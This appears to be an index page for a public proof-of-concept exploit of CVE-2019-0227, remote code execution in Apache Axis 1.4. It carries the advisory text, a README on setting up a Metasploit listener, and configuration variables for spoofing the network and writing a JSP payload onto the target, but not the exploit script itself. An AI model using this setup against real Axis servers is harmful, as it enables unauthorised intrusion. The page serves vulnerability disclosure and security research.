CVE-2019-0227 PoC — Apache Axis Code Issue Vulnerability

Source
Associated Vulnerability
Title: Apache Axis Code Issue Vulnerability (CVE-2019-0227)
Description: A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits continue in the project's Axis 1.x Subversion repository; legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue.
Description
Apache Axis 1.4 remote code execution vulnerability
Readme
# cve-2019-0227
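Apache Axis 1.4 remote code execution vulnerability
You need to set up a listener in msf on your local machine, and you also need to modify lines 24-30 of the code.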

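# You need to change these variables to match your configuration
myip = "192.168.0.117"  # IP of your machine
target = "192.168.0.102"  # IP of the target
gateway = "192.168.0.1"  # Default gateway
targetport = "8080"  # Port the target is running Axis on (probably 8080)
pathtoaxis = "http://192.168.0.102:8080/axis"  # This can be a custom Axis install path, but this is the default
spoofinterface = "eth0"  # Interface used for spoofing
jspwritepath = "webapps\\axis\\exploit.jsp"  # Relative path on the target to write the JSP payload; this is the default path for a Tomcat installation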

File Snapshot

[4.0K] /data/pocs/9ef25c0f12713285c41a15d3740bf9d12c4fbd7b
├── [7.4K] cve-2019-0227.py
└── [ 700] README.md

0 directories, 2 files